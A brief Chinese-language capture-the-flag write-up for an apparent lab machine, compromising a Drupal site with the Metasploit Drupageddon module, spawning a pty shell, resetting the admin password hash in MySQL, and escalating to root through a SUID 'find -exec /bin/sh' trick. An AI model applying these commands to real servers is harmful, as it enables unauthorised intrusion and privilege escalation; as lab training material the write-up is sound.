扫描靶机IP

然后nmap一波。

开放了80端口，访问。

首次访问需要把IP放到hosts中。

cd /etc

find . -name "host*"

vim ./hosts

网站是Drupal服务，上神器msf。

七个可用模块。

使用exploit/multi/http/drupal_drupageddon

设置好options启动攻击

弹回了meterpreter

收集主机信息

进入shell

ls一下，发现flag1

看下权限，发现不是root，需要提权。

根据flag信息，查看配置。

在sites/default/settings.php中

看到了flag2.txt和数据库信息。

直接mysql -udbuser -p,但是不能进入mysql命令行。

查看到了python版本信息。使用python进入交互shell。

python -c "import pty;pty.spawn('/bin/bash')"

再使用

mysql -udbuser -p

成功进入mysql命令行

在users表里发现两个用户。

但是密码被加密了。

用重置密码。

使用drupal自带的hash加密

php scripts/password-hash.sh drupall > pwd.txt

再次进入mysql，对密码进行重置。

update users set pass = '$S$DDuvmUjUDJkHrjjOarywjMVR0Ne/osYlPfLPtWH1bRMbHbZyADey' where name = 'admin';

到网站上，用账号密码登陆。

成功登陆。

找到了flag3

在目录里查找到flag4

根据提示，要进入root目录。但是发现被拒绝。

查找系统上运行的所有suid可执行文件

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

再查找。

find ./ aaa -exec '/bin/sh' \;

成功提权为root。

再进入root目录，成功进入，并找到finalflag。

要点

suid提权